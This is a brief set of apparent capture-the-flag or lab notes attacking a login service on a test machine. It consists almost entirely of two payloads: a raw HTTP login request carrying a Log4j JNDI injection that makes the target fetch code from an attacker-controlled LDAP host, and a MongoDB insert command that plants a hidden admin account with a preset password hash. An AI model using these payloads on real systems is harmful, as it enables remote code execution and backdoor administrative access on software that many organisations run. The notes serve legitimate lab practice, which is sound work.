# Metadata 

IP: 10.129.96.149
date Accessed: 4/1/2022

# Payload Log4j

```

POST /api/login HTTP/1.1
Host: 10.129.96.149:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.129.96.149:8443/manage/account/login?redirect=%2Fmanage
Content-Type: application/json; charset=utf-8
Origin: https://10.129.96.149:8443
Content-Length: 112
Te: trailers
Connection: close

{"username":"admin","password":"admin","remember":
"${jndi:ldap://10.10.14.129:1389/o=tomcat}",
"strict":true}

```


# pay load

db.admin.insert({ "email" : "yam@localhost.local", "last_site_name" : "default", "name" : "yam", "time_created" : NumberLong(100019800), "x_shadow" : "$6$MDn.aRX.e2n0yPZa$90IZIJuBUSShb0YQgDRmEujfTFx3zdZKUS75WgDqlUdZ8JKX/s/9/SMgtgUeO.6YZ4KTvq1.Rs9YHN6LkFsKB." })
